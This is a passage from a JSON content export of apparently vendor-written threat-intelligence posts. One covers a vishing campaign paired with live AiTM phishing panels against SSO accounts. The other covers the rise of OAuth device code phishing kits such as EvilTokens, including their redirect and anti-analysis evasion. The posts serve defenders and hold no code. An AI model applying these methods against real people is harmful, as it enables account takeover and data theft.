",[],{},{"nodeType":173,"value":8712,"marks":8713,"data":8715},"Betterment",[8714],{"type":370},{},{"nodeType":173,"value":8717,"marks":8718,"data":8719}," (20 million records containing PII), ",[],{},{"nodeType":173,"value":8721,"marks":8722,"data":8724},"Crunchbase",[8723],{"type":370},{},{"nodeType":173,"value":8726,"marks":8727,"data":8728}," (2 million records containing PII), and ",[],{},{"nodeType":173,"value":8730,"marks":8731,"data":8733},"SoundCloud",[8732],{"type":370},{},{"nodeType":173,"value":8735,"marks":8736,"data":8737}," (30 million records containing PII). ",[],{},{"nodeType":312,"data":8739,"content":8743},{"target":8740},{"sys":8741},{"id":8742,"type":317,"linkType":318},"5scKHYJJleNklGAXNKVc7b",[],{"nodeType":231,"data":8745,"content":8746},{},[],{"nodeType":169,"data":8748,"content":8749},{},[8750],{"nodeType":173,"value":8751,"marks":8752,"data":8754},"What’s new?",[8753],{"type":370},{},{"nodeType":235,"data":8756,"content":8757},{},[8758],{"nodeType":173,"value":8759,"marks":8760,"data":8762},"The best of both worlds? Vishing + AiTM phishing",[8761],{"type":370},{},{"nodeType":178,"data":8764,"content":8765},{},[8766],{"nodeType":173,"value":8767,"marks":8768,"data":8769},"SLH and threat actors affiliated with “The Com” are no stranger to voice phishing (vishing) or the use of MFA-bypassing Attacker-in-the-Middle (AitM) phishing kits. ",[],{},{"nodeType":178,"data":8771,"content":8772},{},[8773,8776,8784],{"nodeType":173,"value":37,"marks":8774,"data":8775},[],{},{"nodeType":186,"data":8777,"content":8778},{"uri":5002},[8779],{"nodeType":173,"value":8780,"marks":8781,"data":8783},"SLH and it’s precursor groups",[8782],{"type":194},{},{"nodeType":173,"value":8785,"marks":8786,"data":8787}," leveraged vishing to great success in the form of help desk impersonation and password/MFA reset attacks as seen in the high profile Marks & Spencer, Co-Op, and Jaguar Land Rover attacks in 2025, as well as the Caesars and MGM attacks in 2023. MFA-bypassing phishing techniques have also long been a part of their arsenal, from the 2022 0ktapus phishing campaign to more recent use of modern AiTM phishing kits. ",[],{},{"nodeType":178,"data":8789,"content":8790},{},[8791],{"nodeType":173,"value":8792,"marks":8793,"data":8794},"But until now, we haven’t seen them used together. ",[],{},{"nodeType":312,"data":8796,"content":8799},{"target":8797},{"sys":8798},{"id":685,"type":317,"linkType":318},[],{"nodeType":312,"data":8801,"content":8805},{"target":8802},{"sys":8803},{"id":8804,"type":317,"linkType":318},"1IDsaYD3H5MjvPS4ekcUhU",[],{"nodeType":178,"data":8807,"content":8808},{},[8809],{"nodeType":173,"value":8810,"marks":8811,"data":8812},"It makes sense to combine these methods. AiTM phishing kits are flexible, highly customizable, and can be used to target a broad range of apps — including all of the major IdP platforms used for SSO. Vishing on the other hand is proven to increase the effectiveness of social engineering attacks when performed by an effective operator — which SLH are proven to be (helped by predominantly native English speakers making up their membership, along with the use of effective voice phishing tools). ",[],{},{"nodeType":178,"data":8814,"content":8815},{},[8816],{"nodeType":173,"value":8817,"marks":8818,"data":8819},"Both vishing and AiTM phishing are identity-first methods that consciously evade traditional security tools and detection controls at the endpoint and network layer. This makes them highly effective in today’s IT environment. ",[],{},{"nodeType":235,"data":8821,"content":8822},{},[8823],{"nodeType":173,"value":8824,"marks":8825,"data":8827},"A new kind of operator-driven AiTM kit",[8826],{"type":370},{},{"nodeType":178,"data":8829,"content":8830},{},[8831],{"nodeType":173,"value":8832,"marks":8833,"data":8834},"Another unique part about this campaign is that it uses a “live phishing panel” — i.e. a customizable phishing page controlled by the attacker in real time. This enables attackers to dynamically change what a victim sees on a phishing site while speaking to them on the phone. This allows them to guide victims through each step of the login and MFA authentication process.",[],{},{"nodeType":178,"data":8836,"content":8837},{},[8838],{"nodeType":173,"value":8839,"marks":8840,"data":8841},"This is principally to increase the victim’s likelihood of engaging with the phishing page. As you can see in the image below, there are several options that can be presented to the victim — including not just the normal phishing stages of entering credentials and passing MFA checks, but also post-compromise actions (e.g. creating a passkey that would then be controlled by the attacker for persistent access even if an account password is reset). ",[],{},{"nodeType":312,"data":8843,"content":8847},{"target":8844},{"sys":8845},{"id":8846,"type":317,"linkType":318},"73Y2n3tRkGFtfhrA2AVJyv",[],{"nodeType":178,"data":8849,"content":8850},{},[8851],{"nodeType":173,"value":8852,"marks":8853,"data":8854},"At the end of the authentication flow, the threat actor can choose to redirect their target to a “support ticket\" closure screen. This allows the threat actor to manually terminate the session once the compromise is complete while providing the targeted user with context that matches the \"IT support\" ruse. This further reduces the likelihood of post-hoc reporting by a suspicious victim.",[],{},{"nodeType":178,"data":8856,"content":8857},{},[8858,8862,8871],{"nodeType":173,"value":8859,"marks":8860,"data":8861},"Given that this modular, operator-controlled phishing kit is reportedly available “",[],{},{"nodeType":186,"data":8863,"content":8865},{"uri":8864},"https://www.okta.com/blog/threat-intelligence/phishing-kits-adapt-to-the-script-of-callers/",[8866],{"nodeType":173,"value":8867,"marks":8868,"data":8870},"as a service",[8869],{"type":194},{},{"nodeType":173,"value":8872,"marks":8873,"data":8874},"” for criminals, we should expect to see much more of this in future. ",[],{},{"nodeType":235,"data":8876,"content":8877},{},[8878],{"nodeType":173,"value":8879,"marks":8880,"data":8882},"0ktapus 2.0?",[8881],{"type":370},{},{"nodeType":178,"data":8884,"content":8885},{},[8886],{"nodeType":173,"value":8887,"marks":8888,"data":8889},"As we mentioned earlier, Scattered Spider made their reputation launching phishing attacks against Okta accounts in the 2022 0ktapus campaign. ",[],{},{"nodeType":178,"data":8891,"content":8892},{},[8893],{"nodeType":173,"value":8894,"marks":8895,"data":8896},"The vast majority of phishing attacks target IdP accounts because of the widespread access to downstream apps they grant via SSO. ",[],{},{"nodeType":178,"data":8898,"content":8899},{},[8900,8904,8913],{"nodeType":173,"value":8901,"marks":8902,"data":8903},"This comes at the same time as ",[],{},{"nodeType":186,"data":8905,"content":8907},{"uri":8906},"https://www.bleepingcomputer.com/news/security/fake-lastpass-emails-pose-as-password-vault-backup-alerts/",[8908],{"nodeType":173,"value":8909,"marks":8910,"data":8912},"attackers running campaigns to target LastPass master passwords",[8911],{"type":194},{},{"nodeType":173,"value":8914,"marks":8915,"data":8916},". This provides a similar level of access to apps in the form of credentials (and sometimes saved passkeys). ",[],{},{"nodeType":312,"data":8918,"content":8922},{"target":8919},{"sys":8920},{"id":8921,"type":317,"linkType":318},"1vyu5WvdktTnC24TkVFqfs",[],{"nodeType":178,"data":8924,"content":8925},{},[8926,8930,8937],{"nodeType":173,"value":8927,"marks":8928,"data":8929},"Not only is this a goldmine for attackers looking to steal data or pivot to other systems to be able to launch further attacks (e.g. pivoting to cloud and on-prem services for ransomware deployment) but it’s a nightmare for incident responders. If an attacker can access an app and create a backdoor login method (AKA. a ",[],{},{"nodeType":186,"data":8931,"content":8932},{"uri":4342},[8933],{"nodeType":173,"value":4519,"marks":8934,"data":8936},[8935],{"type":194},{},{"nodeType":173,"value":8938,"marks":8939,"data":8940},") it can be very difficult for a security team to identify and clean them up. ",[],{},{"nodeType":312,"data":8942,"content":8946},{"target":8943},{"sys":8944},{"id":8945,"type":317,"linkType":318},"7tILkroPw9w0WLIo1bVV24",[],{"nodeType":178,"data":8948,"content":8949},{},[8950],{"nodeType":173,"value":8951,"marks":8952,"data":8953},"Check out the excerpt from one of our recent webinars below for more information. ",[],{},{"nodeType":312,"data":8955,"content":8959},{"target":8956},{"sys":8957},{"id":8958,"type":317,"linkType":318},"5IVkapjwLp1Ys14vXagQRD",[],{"nodeType":231,"data":8961,"content":8962},{},[],{"nodeType":169,"data":8964,"content":8965},{},[8966],{"nodeType":173,"value":8967,"marks":8968,"data":8970},"Impact analysis",[8969],{"type":370},{},{"nodeType":178,"data":8972,"content":8973},{},[8974],{"nodeType":173,"value":8975,"marks":8976,"data":8977},"This combination of methods is likely to increase the success of these malicious campaigns as well as reducing the likelihood of detection. ",[],{},{"nodeType":178,"data":8979,"content":8980},{},[8981,8985,8993],{"nodeType":173,"value":8982,"marks":8983,"data":8984},"It’s well documented that modern phishing attacks use a wide and ever-expanding range of ",[],{},{"nodeType":186,"data":8986,"content":8988},{"uri":8987},"https://pushsecurity.com/blog/phishing-detection-evasion-launch/",[8989],{"nodeType":173,"value":8157,"marks":8990,"data":8992},[8991],{"type":194},{},{"nodeType":173,"value":8994,"marks":8995,"data":8996}," — from implementing legitimate bot protection technologies to prevent analysis, to only loading pages if the correct parameters are met — such as coming through a specific URL redirect path, and adhering to “normal” browser configs (excluding unusual browser window sizes and the presence of security analysis tools).",[],{},{"nodeType":178,"data":8998,"content":8999},{},[9000],{"nodeType":173,"value":9001,"marks":9002,"data":9003},"In this case, the malicious payload will only trigger in the event that the delivery is approved by an operator in real time. This means that anyone attempting to find and proactively block a phishing page based on indicators of known-bad is going to have a tough time finding and flagging them. If you haven’t got a community of security analysts sharing and tagging samples of malicious pages, it makes it really hard to find and block them at scale before they hit a victim. And if these convincing attacks aren’t being reported, they’re even less likely to be investigated. This is what we mean when we say that most phishing attacks today are effectively zero-day. ",[],{},{"nodeType":178,"data":9005,"content":9006},{},[9007,9011,9016,9019,9028],{"nodeType":173,"value":9008,"marks":9009,"data":9010},"In this case, it’s worth pointing out that the phone call is essentially the delivery vector for the phishing page. This means there’s no email to intercept and analyse. This isn’t new — ",[],{},{"nodeType":173,"value":9012,"marks":9013,"data":9015},"non-email vectors now account for more than 1 in 3 phishing attacks intercepted by Push",[9014],{"type":370},{},{"nodeType":173,"value":2936,"marks":9017,"data":9018},[],{},{"nodeType":186,"data":9020,"content":9022},{"uri":9021},"https://pushsecurity.com/blog/2025-top-phishing-trends/",[9023],{"nodeType":173,"value":9024,"marks":9025,"data":9027},"LinkedIn and Google Search being the top culprits",[9026],{"type":194},{},{"nodeType":173,"value":9029,"marks":9030,"data":9031},". This effectively cuts out the primary phishing detection surface for most organizations.",[],{},{"nodeType":178,"data":9033,"content":9034},{},[9035],{"nodeType":173,"value":9036,"marks":9037,"data":9038},"All this means that unless you’re able to detect and block these attacks in real time, organizations will find themselves unable to counter this evolving threat. ",[],{},{"nodeType":178,"data":9040,"content":9041},{},[9042],{"nodeType":173,"value":9043,"marks":9044,"data":9046},"The best/only way to do that is to be in the browser. ",[9045],{"type":370},{},{"nodeType":231,"data":9048,"content":9049},{},[],{"nodeType":169,"data":9051,"content":9052},{},[9053],{"nodeType":173,"value":9054,"marks":9055,"data":9057},"How Push stops the attack",[9056],{"type":370},{},{"nodeType":178,"data":9059,"content":9060},{},[9061],{"nodeType":173,"value":9062,"marks":9063,"data":9064},"As a browser-based detection and response tool, Push is perfectly positioned to detect and block attacks like this in real-time. ",[],{},{"nodeType":178,"data":9066,"content":9067},{},[9068],{"nodeType":173,"value":9069,"marks":9070,"data":9071},"Push harnesses deep browser telemetry to detect and block phishing based on behaviors, not static indicators. By analyzing how phishing pages behave and how users interact with them, Push uncovers fake pages, attempted credential theft, and phishing kits the moment they load in the browser — regardless of the delivery mechanism, and even when the attack has never been seen before. ",[],{},{"nodeType":312,"data":9073,"content":9077},{"target":9074},{"sys":9075},{"id":9076,"type":317,"linkType":318},"2TAKFM1rpETq4KtTY3FPIs",[],{"nodeType":178,"data":9079,"content":9080},{},[9081],{"nodeType":173,"value":9082,"marks":9083,"data":9084},"Push's browser-based controls include:",[],{},{"nodeType":250,"data":9086,"content":9087},{},[9088,9109],{"nodeType":254,"data":9089,"content":9090},{},[9091],{"nodeType":178,"data":9092,"content":9093},{},[9094,9097,9105],{"nodeType":173,"value":37,"marks":9095,"data":9096},[],{},{"nodeType":186,"data":9098,"content":9100},{"uri":9099},"https://pushsecurity.com/blog/introducing-sso-password-protection/",[9101],{"nodeType":173,"value":9102,"marks":9103,"data":9104},"Fingerprinting high-risk app passwords",[],{},{"nodeType":173,"value":9106,"marks":9107,"data":9108}," so they can only be used on a specific domain. Any attempt to reuse this password elsewhere (such as on a phishing site) results in the attempt being blocked. ",[],{},{"nodeType":254,"data":9110,"content":9111},{},[9112],{"nodeType":178,"data":9113,"content":9114},{},[9115,9118,9126],{"nodeType":173,"value":37,"marks":9116,"data":9117},[],{},{"nodeType":186,"data":9119,"content":9121},{"uri":9120},"https://pushsecurity.com/blog/detecting-and-blocking-phishing-attacks-in-the-browser/",[9122],{"nodeType":173,"value":9123,"marks":9124,"data":9125},"Multiple browser-based checks",[],{},{"nodeType":173,"value":9127,"marks":9128,"data":9129}," looking for indicators of bad, such as cloned elements from legitimate websites, and an ever-growing number of detections relating to phishing kit behaviors and attributes as they are rendered on a page. ",[],{},{"nodeType":312,"data":9131,"content":9135},{"target":9132},{"sys":9133},{"id":9134,"type":317,"linkType":318},"4ESxxjTjNwNXGEW4DBcMVV",[],{"nodeType":178,"data":9137,"content":9138},{},[9139],{"nodeType":173,"value":9140,"marks":9141,"data":9142},"Because Push observes every login made in the browser, you can also use Push to find identities susceptible to phishing attacks, such as those not using phishing-resistant authentication methods (e.g. passkeys), to proactively improve your account hygiene and reduce your attack surface. ",[],{},{"nodeType":178,"data":9144,"content":9145},{},[9146,9150,9159,9163,9171],{"nodeType":173,"value":9147,"marks":9148,"data":9149},"Finally, you can also use our ",[],{},{"nodeType":186,"data":9151,"content":9153},{"uri":9152},"https://pushsecurity.com/blog/employee-identity-verification-codes-release/",[9154],{"nodeType":173,"value":9155,"marks":9156,"data":9158},"employee verification codes",[9157],{"type":194},{},{"nodeType":173,"value":9160,"marks":9161,"data":9162}," feature as part of a layered defense — a simple, browser-based identity check that gives your employees a reliable way to confirm they’re talking to another employee from your organization. It enables employees to quickly verify that a caller is who they say they are by relaying a rotating 6-digit verification code displayed in every employee's browser via the Push extension. This is an effective way of combating ",[],{},{"nodeType":186,"data":9164,"content":9165},{"uri":1034},[9166],{"nodeType":173,"value":9167,"marks":9168,"data":9170},"help desk scams",[9169],{"type":194},{},{"nodeType":173,"value":9172,"marks":9173,"data":9174}," too — another favorite of SLH. ",[],{},{"nodeType":312,"data":9176,"content":9180},{"target":9177},{"sys":9178},{"id":9179,"type":317,"linkType":318},"1TEpCjh8UGwmejgYSGC1by",[],{"nodeType":3769,"data":9182,"content":9183},{},[9184],{"nodeType":178,"data":9185,"content":9186},{},[9187,9190,9197,9200,9206,9209,9216],{"nodeType":173,"value":3925,"marks":9188,"data":9189},[],{},{"nodeType":186,"data":9191,"content":9192},{"uri":1456},[9193],{"nodeType":173,"value":3932,"marks":9194,"data":9196},[9195],{"type":194},{},{"nodeType":173,"value":2936,"marks":9198,"data":9199},[],{},{"nodeType":186,"data":9201,"content":9202},{"uri":3941},[9203],{"nodeType":173,"value":3944,"marks":9204,"data":9205},[],{},{"nodeType":173,"value":3949,"marks":9207,"data":9208},[],{},{"nodeType":186,"data":9210,"content":9211},{"uri":1469},[9212],{"nodeType":173,"value":1472,"marks":9213,"data":9215},[9214],{"type":194},{},{"nodeType":173,"value":1477,"marks":9217,"data":9218},[],{},{"nodeType":178,"data":9220,"content":9221},{},[9222],{"nodeType":173,"value":37,"marks":9223,"data":9224},[],{},"Unpacking the latest SLH campaign — combining vishing with AiTM phishing to hijack SSO accounts","Analysing the latest Scattered Lapsus$ Hunters (SLH) phishing campaign targeting hundreds of organizations.\n","2026-01-28T00:00:00.000Z","unpacking-the-latest-slh-campaign",{"items":9230},[9231,9233],{"sys":9232,"name":505},{"id":504},{"sys":9234,"name":509},{"id":508},{"items":9236},[9237],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":9238},{"url":1496},{"items":9240},[9241],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":9242},{"url":8615},{"json":9244,"links":11818},{"nodeType":165,"data":9245,"content":9246},{},[9247,9267,9286,9293,9299,9306,9313,9316,9324,9330,9414,9434,9440,9447,9576,9579,9587,9594,9600,9603,9611,9652,9658,9665,9672,9679,9686,9704,9710,9716,9722,9728,9734,9740,9746,9752,10015,10018,10026,10161,10167,10170,10178,10312,10318,10321,10329,10476,10482,10485,10493,10634,10640,10643,10651,10798,10804,10807,10815,10961,10967,10970,10978,11073,11079,11082,11090,11184,11190,11193,11201,11207,11340,11346,11356,11359,11367,11379,11386,11392,11399,11420,11436,11442,11450,11476,11483,11489,11496,11499,11507,11515,11536,11557,11562,11569,11576,11584,11600,11607,11626,11629,11637,11644,11651,11698,11704,11711,11714,11722,11729,11736,11756,11762,11769,11776,11782],{"nodeType":178,"data":9248,"content":9249},{},[9250,9254,9263],{"nodeType":173,"value":9251,"marks":9252,"data":9253},"The OAuth 2.0 ",[],{},{"nodeType":186,"data":9255,"content":9257},{"uri":9256},"https://www.rfc-editor.org/rfc/rfc8628",[9258],{"nodeType":173,"value":9259,"marks":9260,"data":9262},"device authorization grant",[9261],{"type":194},{},{"nodeType":173,"value":9264,"marks":9265,"data":9266}," was designed to enable input-constrained devices to sign-in to apps by asking the user to complete the login on a separate device by entering a code. But today, it’s mainly used when accessing CLI tools, meaning that many users encounter the device code flow daily. ",[],{},{"nodeType":178,"data":9268,"content":9269},{},[9270,9273,9282],{"nodeType":173,"value":37,"marks":9271,"data":9272},[],{},{"nodeType":186,"data":9274,"content":9276},{"uri":9275},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/device_code_phishing/description.md",[9277],{"nodeType":173,"value":9278,"marks":9279,"data":9281},"Device code phishing",[9280],{"type":194},{},{"nodeType":173,"value":9283,"marks":9284,"data":9285}," attacks designed to exploit this authorization flow are not new — it was among the first techniques that we added to the SaaS attacks matrix back in 2023. But it’s taken until now for it to really enter mainstream adoption. ",[],{},{"nodeType":178,"data":9287,"content":9288},{},[9289],{"nodeType":173,"value":9290,"marks":9291,"data":9292},"The technique tricks a user into issuing access tokens for an attacker-controlled application (not a device, confusingly). Any app that supports device code logins can be a target. Popular examples include Microsoft, Google, Salesforce, GitHub, and AWS. That said, Microsoft is, as always, much more heavily targeted at scale now than any other app.",[],{},{"nodeType":312,"data":9294,"content":9298},{"target":9295},{"sys":9296},{"id":9297,"type":317,"linkType":318},"Al0pGH8vmOYiufDFiAbt0",[],{"nodeType":178,"data":9300,"content":9301},{},[9302],{"nodeType":173,"value":9303,"marks":9304,"data":9305},"We’ve always been surprised that attackers haven’t commonly used device code phishing in their standard toolkit, preferring session-stealing AITM phishing and other social engineering attacks like ClickFix. But it’s pretty clear from the recent data that the shift to mainstream adoption has now happened. ",[],{},{"nodeType":178,"data":9307,"content":9308},{},[9309],{"nodeType":173,"value":9310,"marks":9311,"data":9312},"In this blog post, we’ll explore the history of device code phishing, what’s changed for it to enter mainstream adoption, how it works under the hood (with recent examples), and what security teams can do about it. ",[],{},{"nodeType":231,"data":9314,"content":9315},{},[],{"nodeType":169,"data":9317,"content":9318},{},[9319],{"nodeType":173,"value":9320,"marks":9321,"data":9323},"A brief history of device code phishing",[9322],{"type":370},{},{"nodeType":312,"data":9325,"content":9329},{"target":9326},{"sys":9327},{"id":9328,"type":317,"linkType":318},"6u3DgvSGChtTJu7l9I7PG1",[],{"nodeType":178,"data":9331,"content":9332},{},[9333,9337,9346,9350,9359,9363,9372,9376,9385,9389,9398,9401,9410],{"nodeType":173,"value":9334,"marks":9335,"data":9336},"The technique was first documented in 2020, before Secureworks released the first tooling framework ",[],{},{"nodeType":186,"data":9338,"content":9340},{"uri":9339},"https://github.com/secureworks/PhishInSuits",[9341],{"nodeType":173,"value":9342,"marks":9343,"data":9345},"PhishInSuits",[9344],{"type":194},{},{"nodeType":173,"value":9347,"marks":9348,"data":9349}," a year later. A host of research followed, including ",[],{},{"nodeType":186,"data":9351,"content":9353},{"uri":9352},"https://github.com/secureworks/squarephish",[9354],{"nodeType":173,"value":9355,"marks":9356,"data":9358},"SquarePhish",[9357],{"type":194},{},{"nodeType":173,"value":9360,"marks":9361,"data":9362}," v1 (using QR codes to trigger the 15 minute code expiration window), Dirk-Jan Mollema’s ",[],{},{"nodeType":186,"data":9364,"content":9366},{"uri":9365},"https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/",[9367],{"nodeType":173,"value":9368,"marks":9369,"data":9371},"key research",[9370],{"type":194},{},{"nodeType":173,"value":9373,"marks":9374,"data":9375}," (chaining device code phishing via Microsoft apps into Primary Refresh Token (PRT) acquisition to gain full browser-level access) and Dennis Kniep’s ",[],{},{"nodeType":186,"data":9377,"content":9379},{"uri":9378},"https://github.com/denniskniep/DeviceCodePhishing",[9380],{"nodeType":173,"value":9381,"marks":9382,"data":9384},"DeviceCodePhishing tool",[9383],{"type":194},{},{"nodeType":173,"value":9386,"marks":9387,"data":9388}," which automates the entire flow with a headless browser. (Other recent noteworthy tools include ",[],{},{"nodeType":186,"data":9390,"content":9392},{"uri":9391},"https://github.com/nromsdahl/squarephish2",[9393],{"nodeType":173,"value":9394,"marks":9395,"data":9397},"SquarePhish2",[9396],{"type":194},{},{"nodeType":173,"value":933,"marks":9399,"data":9400},[],{},{"nodeType":186,"data":9402,"content":9404},{"uri":9403},"https://github.com/praetorian-inc/GitPhish",[9405],{"nodeType":173,"value":9406,"marks":9407,"data":9409},"GitPhish",[9408],{"type":194},{},{"nodeType":173,"value":9411,"marks":9412,"data":9413},", so shout out to those too). ",[],{},{"nodeType":178,"data":9415,"content":9416},{},[9417,9421,9430],{"nodeType":173,"value":9418,"marks":9419,"data":9420},"It wasn’t until August 2024 that in-the-wild exploitation was first identified, with Russia-linked campaigns then continuing into 2025 before entering mainstream criminal adoption. This trend has continued to gather momentum in 2026 with ",[],{},{"nodeType":186,"data":9422,"content":9424},{"uri":9423},"https://thehackernews.com/2026/03/device-code-phishing-hits-340-microsoft.html",[9425],{"nodeType":173,"value":9426,"marks":9427,"data":9429},"EvilTokens",[9428],{"type":194},{},{"nodeType":173,"value":9431,"marks":9432,"data":9433},", the first reported criminal PhaaS kit for device code phishing, already powering massive campaigns after launching in February. ",[],{},{"nodeType":312,"data":9435,"content":9439},{"target":9436},{"sys":9437},{"id":9438,"type":317,"linkType":318},"6xsfmbYEzpW7CdDiNzO6cu",[],{"nodeType":178,"data":9441,"content":9442},{},[9443],{"nodeType":173,"value":9444,"marks":9445,"data":9446},"Some of the noteworthy in-the-wild campaigns include:",[],{},{"nodeType":250,"data":9448,"content":9449},{},[9450,9482,9502],{"nodeType":254,"data":9451,"content":9452},{},[9453],{"nodeType":178,"data":9454,"content":9455},{},[9456,9460,9467,9470,9478],{"nodeType":173,"value":9457,"marks":9458,"data":9459},"Storm-2372, tracked by ",[],{},{"nodeType":186,"data":9461,"content":9463},{"uri":9462},"https://www.microsoft.com/en-us/security/blog/2025/02/13/storm-2372-conducts-device-code-phishing-campaign/",[9464],{"nodeType":173,"value":1255,"marks":9465,"data":9466},[],{},{"nodeType":173,"value":933,"marks":9468,"data":9469},[],{},{"nodeType":186,"data":9471,"content":9473},{"uri":9472},"https://www.volexity.com/blog/2025/02/13/multiple-russian-threat-actors-targeting-microsoft-device-code-authentication/",[9474],{"nodeType":173,"value":9475,"marks":9476,"data":9477},"Volexity",[],{},{"nodeType":173,"value":9479,"marks":9480,"data":9481},", linked to multiple Russia-aligned clusters, combining spear-phishing and social engineering with device code phishing payloads against strategic intelligence targets.",[],{},{"nodeType":254,"data":9483,"content":9484},{},[9485],{"nodeType":178,"data":9486,"content":9487},{},[9488,9492,9498],{"nodeType":173,"value":9489,"marks":9490,"data":9491},"The massive Salesforce campaign operated by ",[],{},{"nodeType":186,"data":9493,"content":9494},{"uri":5002},[9495],{"nodeType":173,"value":6811,"marks":9496,"data":9497},[],{},{"nodeType":173,"value":9499,"marks":9500,"data":9501}," (SLH) combined vishing with a device code phishing payload targeting Salesforce. The attacks morphed into a broader supply chain campaign using stolen credentials, ultimately resulting in 1000+ organizations being compromised and over 1.5 billion stolen records claimed. ",[],{},{"nodeType":254,"data":9503,"content":9504},{},[9505],{"nodeType":178,"data":9506,"content":9507},{},[9508,9512,9520,9524,9533,9537,9546,9550,9559,9563,9572],{"nodeType":173,"value":9509,"marks":9510,"data":9511},"A massive spike in activity in late 2025 and 2026. This includes ",[],{},{"nodeType":186,"data":9513,"content":9515},{"uri":9514},"https://www.proofpoint.com/us/blog/threat-insight/access-granted-phishing-device-code-authorization-account-takeover",[9516],{"nodeType":173,"value":9517,"marks":9518,"data":9519},"multiple threat clusters",[],{},{"nodeType":173,"value":9521,"marks":9522,"data":9523}," tracked using device code phishing techniques, more ",[],{},{"nodeType":186,"data":9525,"content":9527},{"uri":9526},"https://www.bleepingcomputer.com/news/security/hackers-target-microsoft-entra-accounts-in-device-code-vishing-attacks/",[9528],{"nodeType":173,"value":9529,"marks":9530,"data":9532},"criminal operations linked to SLH",[9531],{"type":194},{},{"nodeType":173,"value":9534,"marks":9535,"data":9536},", and ",[],{},{"nodeType":186,"data":9538,"content":9540},{"uri":9539},"https://newtonpaul.com/blog/device-code-phish-update/",[9541],{"nodeType":173,"value":9542,"marks":9543,"data":9545},"hundreds of organizations being targeted via PhaaS architecture,",[9544],{"type":194},{},{"nodeType":173,"value":9547,"marks":9548,"data":9549}," which looks to be the same campaign as the recently uncovered EvilTokens PhaaS reported by ",[],{},{"nodeType":186,"data":9551,"content":9553},{"uri":9552},"https://www.huntress.com/blog/railway-paas-m365-token-replay-campaign",[9554],{"nodeType":173,"value":9555,"marks":9556,"data":9558},"Huntress",[9557],{"type":194},{},{"nodeType":173,"value":9560,"marks":9561,"data":9562}," (featuring abuse of the Railway PaaS platform). Abnormal has also reported on a closed-source PhaaS kit called ",[],{},{"nodeType":186,"data":9564,"content":9566},{"uri":9565},"https://abnormal.ai/blog/venom-phishing-campaign-mfa-credential-theft",[9567],{"nodeType":173,"value":9568,"marks":9569,"data":9571},"Venom",[9570],{"type":194},{},{"nodeType":173,"value":9573,"marks":9574,"data":9575}," that offers device code phishing capabilities that appear visually and functionally similar to EvilTokens.   ",[],{},{"nodeType":231,"data":9577,"content":9578},{},[],{"nodeType":169,"data":9580,"content":9581},{},[9582],{"nodeType":173,"value":9583,"marks":9584,"data":9586},"What we’re seeing in the wild",[9585],{"type":370},{},{"nodeType":178,"data":9588,"content":9589},{},[9590],{"nodeType":173,"value":9591,"marks":9592,"data":9593},"As mentioned, we’ve also seen a huge spike in device code phishing activity this year, with multiple kits, page designs, and lure types. We’ve identified 10 distinct kits in circulation in the wild, with EvilTokens being the most prevalent. It’s clear that attackers are both spinning up their own kits and creative derivatives of others — we’ve seen kits that are visually similar to EvilTokens (close enough to be clones or forks) but with very different backends, for example AWS, Digital Ocean, 2cloud, and more. ",[],{},{"nodeType":312,"data":9595,"content":9599},{"target":9596},{"sys":9597},{"id":9598,"type":317,"linkType":318},"nJCbTw85GKXdqrlIkzZwi",[],{"nodeType":231,"data":9601,"content":9602},{},[],{"nodeType":235,"data":9604,"content":9605},{},[9606],{"nodeType":173,"value":9607,"marks":9608,"data":9610},"“ANTIBOT” (EvilTokens)",[9609],{"type":370},{},{"nodeType":178,"data":9612,"content":9613},{},[9614,9617,9624,9627,9636,9640,9648],{"nodeType":173,"value":37,"marks":9615,"data":9616},[],{},{"nodeType":186,"data":9618,"content":9619},{"uri":9552},[9620],{"nodeType":173,"value":9555,"marks":9621,"data":9623},[9622],{"type":194},{},{"nodeType":173,"value":2936,"marks":9625,"data":9626},[],{},{"nodeType":186,"data":9628,"content":9630},{"uri":9629},"https://blog.sekoia.io/new-widespread-eviltokens-kit-device-code-phishing-as-a-service-part-1/",[9631],{"nodeType":173,"value":9632,"marks":9633,"data":9635},"Sekoia",[9634],{"type":194},{},{"nodeType":173,"value":9637,"marks":9638,"data":9639},", and researcher ",[],{},{"nodeType":186,"data":9641,"content":9642},{"uri":9539},[9643],{"nodeType":173,"value":9644,"marks":9645,"data":9647},"Paul Newton",[9646],{"type":194},{},{"nodeType":173,"value":9649,"marks":9650,"data":9651}," have already done a great job of providing IOCs for the recent EvilTokens activity spike, including multiple backend Railway IPs in authentication events. ",[],{},{"nodeType":312,"data":9653,"content":9657},{"target":9654},{"sys":9655},{"id":9656,"type":317,"linkType":318},"1XNviq5OvMf5TEAc59F6g5",[],{"nodeType":178,"data":9659,"content":9660},{},[9661],{"nodeType":173,"value":9662,"marks":9663,"data":9664},"Beyond the most widely observed implementation featuring a Cloudflare Workers frontend and Railway backend for authentication, we’ve also tracked additional versions of EvilTokens in circulation since January 2026 (many of which remain live along with the current “production” version of the kit). ",[],{},{"nodeType":178,"data":9666,"content":9667},{},[9668],{"nodeType":173,"value":9669,"marks":9670,"data":9671},"You can see an evolution of the kit in the videos and screenshots below, from early precursors seen in mid-January, the first mentions of ANTIBOT in the page code in late-January, the parallel development of a “Courts Access” fork that lacks the ANTIBOT references, and finally production EvilTokens in February. One of the key threads between the versions is the presence of a generateFallbackCode() JS function and use of a /generate-codes API call. ",[],{},{"nodeType":178,"data":9673,"content":9674},{},[9675],{"nodeType":173,"value":9676,"marks":9677,"data":9678},"Early implementations were quite different, for example using ScrapingBee to generate the displayed code, and varied hosting on vercel, fastly, edgeone, and others. ",[],{},{"nodeType":178,"data":9680,"content":9681},{},[9682],{"nodeType":173,"value":9683,"marks":9684,"data":9685},"After initially appearing on custom domains, the production version is now predominantly hosted on Cloudflare Workers, as per the broader tracking of the campaign. The descriptive HTML comments around ANTIBOT functions have also been removed in later versions. ",[],{},{"nodeType":178,"data":9687,"content":9688},{},[9689,9693,9700],{"nodeType":173,"value":9690,"marks":9691,"data":9692},"The production version of EvilTokens showcases common ",[],{},{"nodeType":186,"data":9694,"content":9695},{"uri":6820},[9696],{"nodeType":173,"value":8157,"marks":9697,"data":9699},[9698],{"type":194},{},{"nodeType":173,"value":9701,"marks":9702,"data":9703}," we've come to associate with PhaaS kits in the AiTM space — using multiple redirects through trusted sites before serving the malicious page, using bot protection to block security tools from analysing the page, and so on. It also uses a pop-up window for the device code entry rather than a redirect, reducing the friction for the victim (it looks pretty convincing, 